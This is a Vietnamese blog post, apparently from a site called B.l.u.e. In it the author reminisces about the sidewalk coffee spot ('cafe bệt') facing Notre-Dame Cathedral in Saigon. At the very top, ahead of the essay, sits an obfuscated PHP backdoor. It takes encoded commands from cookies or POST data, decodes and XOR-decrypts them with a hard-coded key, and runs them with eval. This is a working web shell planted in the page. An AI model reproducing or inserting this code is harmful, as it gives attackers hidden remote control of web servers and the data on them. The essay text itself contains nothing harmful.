$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> Sài Gòn của anh – Cafe bệt – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Sài Gòn của anh – Cafe bệt

Cafe bệt

Bạn anh ở Hà Nội vào đây nói, anh xin lỗi, anh lập lại nguyên văn, chứ anh thì không bao giờ chửi thề: đm, cái xứ đe’o gì mà toàn quán cafe là quán cafe.

Cô giáo lớp 1 của anh từng dạy rằng, hễ ai chửi thề thì người đó là người xấu.
Cô giáo lớp 2 của anh lại bảo, nên chọn người thật thà mà chơi.
Thế thì anh biết làm sao, phỏng ạ! Bởi câu nói trên của bạn anh là hoàn toàn đúng.

Cám ơn trời, anh không phải dân Nhân Văn, vì thế anh cực dốt viết những gì đi sâu, tận sâu vào văn hoá, phong tục, tập quán. Nhưng anh có cái miệng, vì vậy, anh nghĩ rằng anh có quyền gọi: Văn hoá cafe Sài Gòn.

Sài Gòn chi chít quán cafe, đủ mọi thể loại và phong cách. Có quán đánh vào sự trẻ trung, nhịp sống hiện đại, có quán tìm về không gian trầm mặc, cổ xưa. Có nơi mở jazz, nơi Tuấn Ngọc, nơi gào thét tiếng nhạc Rock chát chúa. Mỗi quán, à không, mỗi thể loại quán, đều góp phần tạo nên cái gọi là Văn hoá cafe Sài Gòn (mà anh đã nhắc ở trên). Tuy nhiên, cafe đặc biệt nhất, theo anh chính là cafe bệt.

Thực ra, không ai biết tên chính xác của cafe bệt là gì, bởi vì nó làm khỉ gì có tên. Chỉ là mỗi người một cách gọi, và bọn anh quen gọi nó như thế.
Cafe bệt nằm ở ngay công viên gì đấy trước Dinh Độc Lập, được chia theo vị trí thành bốn góc (mà có bạn gọi là 4 vùng chiến khu). Trong đó, góc anh hay ngồi nhất là góc đối diện ngay Nhà Thờ Đức Bà.

Nói về ý nghĩa cuộc sống này nọ thì nghe có vẻ triết lí quá – nếu nói theo nghĩa lịch sự, còn nói theo ngôn ngữ bình thường là: xạo bỏ mẹ. Nhưng đúng là, một buổi sáng, à, Sài Gòn này vẫn có khái niệm sáng sớm, nhưng không rõ ràng lắm. Có lẽ, khái niệm buổi sáng sớm của Sài Gòn nên là 7h sáng thì đúng hơn. Nhắc lại, tầm 7h sáng ngồi ở cafe bệt, nhâm nhi li cafe và ổ bánh mì (anh thề, chẳng ngon lành gì sất, nhưng ăn thích thích), và ngắm dòng người – xe chạy thoăn thoắt đủ mọi ngả, lâu lâu chau mày vì những tia nắng sớm mai xuyên qua kẽ lá, nhảy đùa nghịch trên khuôn mặt, cảm giác ấm áp nơi mái tóc chưa gội mấy ngày. Lúc đấy, nhìn lên bầu trời tươi tắn, không một gợn mây, phóng tầm mắt ra xa xíu nữa, bắt gặp vẻ cổ kích như mãi trường tồn với thời gian của nhà thờ Đức Bà, xen với vẻ hiện đại của toà nhà cao tầng Diamond Plaza với lớp kiếng phản chiếu hàng cây xanh – xanh ngắt, khẽ lẩm bẩm câu hát màu nắng hay là màu mắt em. Với anh, đấy đích thực là cảm giác an bình.

Những ngày anh chia tay với bạn gái, anh thực hiện lối sống khốn nạn một cách triệt để: tối ngủ sớm, sáng dậy đi bơi. Đi bơi xong, anh và thằng bạn hay phóng một mạch lên cafe bệt, chỉ đơn thuần là ngồi đó đọc báo giấy và ngắm cảnh, ngắm người. Không lâu đâu, chỉ cần 30′ thôi, rồi cũng lại nhập vào cái dòng xoay hối hả ấy. Nhưng như thế đã là quá hoàn hảo để bắt đầu một ngày mới…

Cảm giác an bình mà hiếm hoi anh tìm được ở Sài Gòn của anh chính là nơi Cafe bệt.

B.l.u.e

p/s: ảnh của kylin nguồn từ Diễn đàn tin học.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.